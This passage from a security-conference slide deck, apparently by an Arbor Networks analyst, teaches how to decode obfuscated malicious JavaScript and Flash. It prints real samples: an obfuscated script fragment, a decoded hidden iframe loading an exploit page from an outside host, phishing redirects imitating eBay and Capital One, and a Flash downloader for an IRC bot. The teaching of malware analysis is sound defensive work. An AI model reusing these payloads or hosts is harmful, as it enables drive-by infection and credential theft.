  • 36. Sneaky Example $ wget --user-agent=' ' -m http://www.99express.com/indexxx.html <HTML><SCRIPT LANGUAGE=quot;JavaScriptquot;> <!-- function K508A7(B2B5E7){var H74E49=arguments.callee.toString().replace(/W/g,quot;quot;).to UpperCase();var Q10CCF;var UAC893=H74E49.length;var D9C672;var AEEA53;var R72B7F=quot;quot;;var E9B774=new Array(0,1996959894,3993919788,2567524794,124634137,1886 057615,3915621685,2657392035,249268274,2044508324,37721 15230,2547177864,162941995,2125561021,3887607047,242844 4049,498536548,1789927666,4089016648,2227061214,4505488 61,1843258603,4107580753,2211677639,325883990,168477715 2,4251122042,2321926636,335633487,16613… So far this just looks like a more convoluted encoder arbornetworks.com Page 36 Company Confidential
  • 37. Decoding Sneaky … Clean up Jscript, remove HTML Execute in js(1) $ js -g indexxx.js js: evaluation of file `indexxx.js' failed: indexxx.js:1: illegal object for call_method What’s wrong? var H74E49= arguments.callee.toString(). replace(/W/g,quot;quot;).toUpperCase(); NJS js(1) doesn’t know about ‘arguments’ arbornetworks.com Page 37 Company Confidential
  • 38. arguments.callee … • Self reference … callee is a property of the arguments local variable available within all function objects; callee as a property of Function.arguments is no longer used. (Function.arguments itself is also deprecated.) arguments.callee allows anonymous functions to refer to themselves, which is necessary for recursive anonymous functions. • Source: Core JavaScript 1.5 Reference: Functions:arguments:callee, Mozilla website • Often used as a tamper-proof method arbornetworks.com Page 38 Company Confidential
  • 39. Enter SpiderMonkey • SpiderMonkey is the code-name for the Mozilla's C implementation of JavaScript. • http://www.mozilla.org/js/spidermonkey/ • Builds on UNIX, OS X, etc arbornetworks.com Page 39 Company Confidential
  • 40. Making Sneaky Work Prepend a working document object (my basic document object doesn’t work with SpiderMonkey) function my_document () { // a property (initialized to string) this.m_property=quot;quot;; this.write=function(string) { print(quot;my_document::writequot;); print(string); } }; // declare a globally-accessible document object var document=new my_document(); From http://www.websense.com/securitylabs/blog/blog.php?BlogID=98 arbornetworks.com Page 40 Company Confidential
  • 41. Run it Through SpiderMonkey $ cat jose.html | ./js my_document::write </textarea><iframe src=quot;http://ibm- ssl.com:81/cgi-bin/nsp.cgi?p=buyquot; width=1 height=1 style=quot;border: 0pxquot;></iframe> • Notice the close textarea tag • Code also will barf on alert() • Notice that the decode array expected the full decode function • Cannot mess with it via print() or alert()! arbornetworks.com Page 41 Company Confidential
  • 42. Sometimes We Need Other Tools • Sometimes NJS js(1) will barf on some character codes • What do we do? We call out to another language • I like Python so … • s = <array of numbers as a Python tuple> • … for i in s: r += chr(s) … arbornetworks.com Page 42 Company Confidential
  • 43. Malicious JScript in the Large • NeoSploit • Similar to Web Attacker framework • Lots of exploits • Enumerates vulnerable components – Web browser – Accessible CLSIDs – At least 7 different exploits • Fingerprints you quickly • Launches the right exploit arbornetworks.com Page 43 Company Confidential
  • 44. Where We See This Stuff Day to Day • Feebs worm – Convoluted JavaScript body drops a VBScript malware reassembler • ADODB.Stream() exploits – Usually grab a first stage EXE • Other ActiveX exploits – Often mutliple CLSIDs stacked in one malicious web page arbornetworks.com Page 44 Company Confidential
  • 45. Tools and Tips • curl(1) and wget(1) are your friend – Learn how to set your own Referrer and User-Agent fields • Don’t use a vulnerable browser when you’re doing this work • tee(1) or script(1) most of your cmdline work • My favorite platforms: UNIX, OS X arbornetworks.com Page 45 Company Confidential
  • 46. Unsolved Problems • No complement to js(1) for VBScript … anyone? – Suggestion: WINE with cscript.exe • RELIABLE generic detection – IDS, IPS sigs – Browser plugins • Non-browser based honeyclients don’t understand JS – Bolt in SpiderMonkey C bindings? arbornetworks.com Page 46 Company Confidential
  • 47. Bonus Material: Flash Malware • Flash can contain JavaScript actions within • These JavaScript actions can affect the browser • Tool of choice: Flasm – Flasm is a free command line assembler/disassembler of Flash ActionScript bytecode. – http://flasm.sourceforge.net/ arbornetworks.com Page 47 Company Confidential
  • 48. Phlash Redirection Real Example from December 10, 2006 http://i127.photobucket.com/albums/p126/click2es/prize.swf $ flasm -d /home/jose/malware/10dec06/i127.photobucket.com/albums/p126/c lick2es/prize.swf Flasm configuration file flasm.ini not found, using default values movie '/home/jose/ … /prize.swf' compressed // flash 6, total frames: 1, frame rate: 12 fps, 50x40 px frame 0 getURL 'http://www.fair- faxy.com/Signin.eBay.com.ws.eBayISAPI.dslSignInco.partnerId.p UserId.siteid.pageType.pa1.i1.BshowGif.UsingSSL.https.ebay.co m.pa2.errmsg.runame.ruparams.ruproduct.sid.confirm5.htm' '_self' end // of frame 0 end arbornetworks.com Page 48 Company Confidential
  • 49. Flash Exploit Downloader 22:45:30 < dfx> http://hiltonfreak.tripod.com/parishilton.swf frame 156 Downloads IRC Bot getURL 'javaplugin.zip' '_top' end // of frame 156 Archive: hiltonfreak.tripod.com/javaplugin.zip Length Date Time Name -------- ---- ---- ---- 13624 04-13-07 22:13 readme.txt 60960 04-13-07 21:44 javaplugin.exe -------- ------- arbornetworks.com Page 49 Company Confidential
  • 50. Phishing in Flash • Call out to web components to build what appears to be a legit site • All run within a Flash object • Intercept data, process and steal • Huge decodes, but Flasm shows how it’s done arbornetworks.com Page 50 Company Confidential
  • 51. Phlash Phishing 19 March 2007: http://200.29.161.100/1/capital2.swf … defineButton 164 on overDownToOverUp getURL 'http://www.capitalone.com/' '_blank' end end // of defineButton 164 defineButton 165 on overDownToOverUp getURL 'http://www.capitalone.com/legal/privacy.php' '_blank' end end // of defineButton 165 … arbornetworks.com Page 51 Company Confidential
  • 52. Back to JavaScript • The bad guys are using JavaScript as their delivery vehicle • JavaScript: Learn it, love it • They’re limited by the fact that the JavaScript has to be decoded to be used by the browser • Their obfuscation tools are primitive but effective – But they require a human to analyze • They’ll continue to push the envelope – Malware2.0? arbornetworks.com Page 52 Company Confidential
  • 53. Thank You Acknowledgements • A (wishes to remain anonymous) • Websense guys • Ken Dunham @ iDef • Joe Stewart @ SecureWorx • You arbornetworks.com Page 53 Company Confidential